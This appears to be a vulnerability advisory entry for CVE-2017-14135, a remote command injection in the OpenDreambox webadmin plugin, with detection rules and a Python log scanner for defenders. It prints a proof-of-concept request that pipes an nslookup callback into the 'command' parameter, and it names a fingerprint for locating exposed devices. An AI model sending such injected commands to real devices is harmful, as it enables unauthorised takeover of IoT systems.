CVE-2017-14135
published 2017-09-04

Priority: P184 (critical)
CVSS 3.0: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Flags: ITW, EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 21.84% (97.3th percentile)

enigma2-plugins/blob/master/webadmin/src/WebChilds/Script.py in the webadmin plugin for opendreambox 2.0.0 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the command parameter to the /script URI.

Affected (1 range)

Vendor | Product | Version range | Fixed in
dreambox | opendreambox | |

Detection & IOCs (extracted from sources)

url: /webadmin/script?command=
path: /webadmin/script
command: GET /webadmin/script?command=|%20nslookup%20{{interactsh-url}}
snort
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible OpenDreamBox Attempted Remote Command Injection Inbound"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/webadmin/script?command="; fast_pattern; reference:url,unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/; reference:cve,CVE-2017-14135; classtype:attempted-admin; sid:2027453; rev:3; metadata:attack_target IoT, created_at 2019_06_11, deployment Perimeter, performance_impact Low, confidence High, signature_severity Major, updated_at 2020_08_31, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
snort
alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"ET EXPLOIT Possible OpenDreamBox Attempted Remote Command Injection Outbound"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/webadmin/script?command="; fast_pattern; reference:url,unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/; reference:cve,CVE-2017-14135; classtype:attempted-admin; sid:2027452; rev:3; metadata:attack_target IoT, created_at 2019_06_11, deployment Perimeter, performance_impact Low, confidence High, signature_severity Major, updated_at 2020_08_31, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
  • Exploit traffic uses shell metacharacter '|' in the 'command' parameter of POST/GET requests to /webadmin/script — look for pipe, semicolon, backtick, or other shell metacharacters in that parameter.
  • Response body containing '/bin/sh' or '/usr/script' is a strong indicator of successful exploitation.
  • Shodan/FOFA fingerprint for exposed targets: HTTP title 'Dreambox WebControl' — use as a pre-exploitation discovery indicator.
  • Emerging Threats rules (SID 2027452/2027453) flag both inbound and outbound POST requests containing '/webadmin/script?command=' — associated with Mirai variant exploitation of IoT devices.
  • DNS callback (OOB) via nslookup is used in PoC to confirm blind RCE — monitor for unexpected DNS lookups originating from OpenDreambox hosts.
  • The Emerging Threats Snort rules (SID 2027452/2027453) only match POST method requests to /webadmin/script?command=; the Nuclei PoC template uses GET — detection rules may miss GET-based exploitation attempts.
  • The vulnerable file path is within the webadmin plugin source; exploitation requires the webadmin plugin to be installed and accessible on the target OpenDreambox 2.0.0 device.
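
The POST-only gap noted above can be covered at log-review time by matching on the path and the decoded parameter content instead of the HTTP method. This is an added example, not taken from any of the cited sources; it assumes combined-format access log lines with the command in the query string, and the sample lines and function names are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Characters a shell treats specially; any of them in 'command' is suspicious.
SHELL_META = re.compile(r"[|;&`$<>\n\r]")
# Request line as it appears in a combined-format access log (assumed format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def inspect_line(line):
    """Return a finding dict for a suspicious /webadmin/script request,
    or None. The HTTP method is recorded but never used as a filter."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path.rstrip("/") != "/webadmin/script":
        return None
    # parse_qs percent-decodes values, so %7C and a literal | are treated alike.
    values = parse_qs(url.query, keep_blank_values=True,
                      separator="&").get("command", [])
    hits = sorted({c for v in values for c in SHELL_META.findall(v)})
    if not hits:
        return None
    return {"method": m.group("method"), "command": values, "metachars": hits}

def scan(lines):
    """Inspect every log line and return the findings in input order."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample log lines (documentation addresses, placeholder domain).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET '
    '/webadmin/script?command=|%20nslookup%20oob.example.invalid HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "POST '
    '/webadmin/script?command=%7C%20nslookup%20oob.example.invalid HTTP/1.1" 200 40',
    '192.0.2.12 - - [01/Jan/2024:10:01:00 +0000] "GET '
    '/webadmin/script?command=backup.sh HTTP/1.1" 200 18',
    '192.0.2.13 - - [01/Jan/2024:10:02:00 +0000] "GET /web/about HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```
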

CVSS provenance

nvd v3.0: 9.8 CRITICAL (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
nvd v2.0: 10.0 CRITICAL (AV:N/AC:L/Au:N/C:C/I:C/A:C)
vulncheck: 9.8 CRITICAL